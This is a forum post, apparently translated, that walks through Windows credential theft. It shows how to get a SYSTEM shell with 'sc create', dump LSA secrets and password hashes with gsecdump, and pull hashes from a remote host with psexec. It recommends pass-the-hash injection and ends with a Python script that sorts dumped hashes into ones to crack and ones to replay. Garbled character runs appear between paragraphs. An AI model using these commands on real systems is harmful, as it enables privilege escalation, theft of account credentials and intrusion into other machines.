To get a DOS prompt as NT SYSTEM:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------
Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD
' \7 J3 y/ L& }! q/ h% N
Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.
" W+ G0 @8 l: g
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LM hashes that can be easily broken with Rainbow Tables.
& z- N# x. d( p+ z
A tip: you can use the iam tool from the pshtools toolkit to inject the hashes you just grabbed with gsecdump into the local lsass process, which gives you a hash injection attack. The foreigners really are good at this; admins are going to be busy now. The LM/NT hashes you pick up during ARP spoofing, and the ones you get with gethash, don't actually need to be cracked at all; it is all just tool use. As the original post puts it, whether the password is 4 characters or 127, once you have the hash it is 100% done.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to be from 2007/03/16. Depressing, what a gap.
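An added example to go with the two points above (LM hashes being rainbow-table fodder, and the hashes being usable directly for hash injection without cracking). This is my own triage script, not something from the original post, from gsecdump or from the pshtools kit. It assumes the dump was saved in the classic pwdump line format user:rid:LMHASH:NTHASH::: (adjust the split if your dump tool writes a different layout); the sample lines in it are constructed and the hashes are only illustrative. It uses two facts about the LM scheme: the LM hash of the empty password is aad3b435b51404eeaad3b435b51404ee (each half is DES of "KGS!@#$%" under an all-zero 7-byte key), so a second half equal to aad3b435b51404ee means the password is at most 7 characters and only one half needs to be cracked; and the NT hash of the empty password is 31d6cfe0d16ae931b73c59d7e0c089c0.

```python
"""Triage a pwdump-style hash dump for LM exposure.

Added example, not from the original post or from gsecdump/pshtools.
Assumes the classic pwdump line format  user:rid:LMHASH:NTHASH:::
(written by many dump tools); the sample lines below are constructed.
"""
import re

# LM hash of the empty password: both DES halves computed with an all-zero
# 7-byte key. This is what is stored when LM hashing is disabled.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_LM_HALF = EMPTY_LM[:16]
# NT hash (MD4 of the UTF-16LE empty string) of the empty password.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

HEX32 = re.compile(r"^[0-9a-fA-F]{32}$")

# Constructed sample dump (no real accounts; hashes are illustrative only).
SAMPLE_DUMP = """\
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:0182bd0bd4444bf8aad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::
alice:1002:aad3b435b51404eeaad3b435b51404ee:2c46b24e6e3de3ede12b16d9b35d16cc:::
# comment line that should be ignored
"""


def parse_dump(text):
    """Return (user, rid, lm, nt) tuples; skip blank, comment and malformed lines."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            continue
        user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        if not (HEX32.match(lm) and HEX32.match(nt)):
            continue
        rows.append((user, rid, lm, nt))
    return rows


def classify(lm, nt):
    """Describe how weak a stored credential is, judged from its hashes alone."""
    if nt == EMPTY_NT:
        return "empty password"
    if lm == EMPTY_LM:
        # Only the NT hash is stored: no LM rainbow-table shortcut, but the NT
        # hash on its own is still enough for pass-the-hash (iam-style injection).
        return "NT only (pass-the-hash capable)"
    if lm[16:] == EMPTY_LM_HALF:
        # Second DES half is the empty-key constant, so the password is 1-7
        # characters: a single 7-char uppercase half to look up in a table.
        return "LM present, password <= 7 chars"
    return "LM present, password 8-14 chars (two independent halves)"


def triage(text):
    """Map each parsable user to its classification."""
    return {user: classify(lm, nt) for user, _rid, lm, nt in parse_dump(text)}


if __name__ == "__main__":
    for user, verdict in triage(SAMPLE_DUMP).items():
        print(f"{user:15} {verdict}")
```

Feed it the Active-HASH.TXT from the psexec line above (after converting to the assumed format if needed) and it tells you which accounts can be cracked half at a time and which ones you would simply replay.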